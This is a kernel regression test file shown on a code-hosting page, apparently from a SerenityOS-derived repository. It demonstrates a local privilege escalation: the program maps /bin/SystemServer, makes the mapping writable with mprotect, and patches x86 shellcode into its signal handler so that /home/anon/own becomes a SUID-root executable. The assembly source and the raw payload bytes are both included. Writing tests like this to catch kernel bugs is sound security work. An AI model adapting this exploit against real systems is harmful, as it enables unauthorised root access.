We use cookies to ensure you get the best experience on our website
Domů Procházet Nápověda
Registrovat se Přihlásit se
0ct0pu5
/
ladybird
1
0
Rozštěpit 0
Soubory Úkoly 0 Pull Requesty 0 Wiki
Strom: fe9680f0a4
Větve Značky
ladybird
/
Tests
/
Kernel
/
mmap-write-into-running-programs-executable-file.cpp

mmap-write-into-running-programs-executable-file.cpp 1.6 KB
Historie Surový

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970 
  1. #include <AK/Types.h>
    2. 

  2. #include <fcntl.h>
    3. 

  3. #include <stdio.h>
    4. 

  4. #include <string.h>
    5. 

  5. #include <sys/mman.h>
    6. 

  6. #include <unistd.h>
    7. 

  7. 

  8. int main()
    9. 

  9. {
    10. 

  10.     int fd = open("/bin/SystemServer", O_RDONLY);
    11. 

  11.     if (fd < 0) {
    12. 

  12.         perror("open");
    13. 

  13.         return 1;
    14. 

  14.     }
    15. 

  15.     u8* ptr = (u8*)mmap(nullptr, 16384, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
    16. 

  16.     if (ptr == MAP_FAILED) {
    17. 

  17.         perror("mmap");
    18. 

  18.         return 1;
    19. 

  19.     }
    20. 

  20. 

  21.     if (mprotect(ptr, 16384, PROT_READ | PROT_WRITE) < 0) {
    22. 

  22.         perror("mprotect");
    23. 

  23.         return 1;
    24. 

  24.     }
    25. 

  25. 

  26.     /*
    27. 

  27.      *
    28. 

  28.      * This payload replaces the start of sigchld_handler in the /bin/SystemServer file.
    29. 

  29.      * It does two things:
    30. 

  30.      *
    31. 

  31.      * chown ("/home/anon/own", 0, 0);
    32. 

  32.      * chmod ("/home/anon/own", 04755);
    33. 

  33.      *
    34. 

  34.      * In other words, it turns "/home/anon/own" into a SUID-root executable! :^)
    35. 

  35.      *
    36. 

  36.      */
    37. 

  37. 

  38. #if 0
    39. 

  39.     [bits 32]
    40. 

  40.     [org 0x0804b111]
    41. 

  41.     jmp $+17
    42. 

  42.     path:
    43. 

  43.     db "/home/anon/own", 0
    44. 

  44.     mov eax, 79
    45. 

  45.     mov edx, path
    46. 

  46.     mov ecx, 0
    47. 

  47.     mov ebx, 0
    48. 

  48.     int 0x82
    49. 

  49.     mov eax, 67
    50. 

  50.     mov edx, path
    51. 

  51.     mov ecx, 15
    52. 

  52.     mov ebx, 2541
    53. 

  53.     int 0x82
    54. 

  54.     ret
    55. 

  55. #endif
    56. 

  56. 

  57.     const u8 payload[] = {
    58. 

  58.         0xeb, 0x0f, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x61, 0x6e, 0x6f,
    59. 

  59.         0x6e, 0x2f, 0x6f, 0x77, 0x6e, 0x00, 0xb8, 0x4f, 0x00, 0x00, 0x00,
    60. 

  60.         0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xbb,
    61. 

  61.         0x00, 0x00, 0x00, 0x00, 0xcd, 0x82, 0xb8, 0x43, 0x00, 0x00, 0x00,
    62. 

  62.         0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x0f, 0x00, 0x00, 0x00, 0xbb,
    63. 

  63.         0xed, 0x09, 0x00, 0x00, 0xcd, 0x82, 0xc3
    64. 

  64.     };
    65. 

  65. 

  66.     memcpy(&ptr[0x3111], payload, sizeof(payload));
    67. 

  67. 

  68.     printf("ok\n");
    69. 

  69.     return 0;
    70. 

  70. }
    71.

Contact | Legal | Takedown | Status
Self-hosted public services - About
NibbleSpot by 0ct0pu5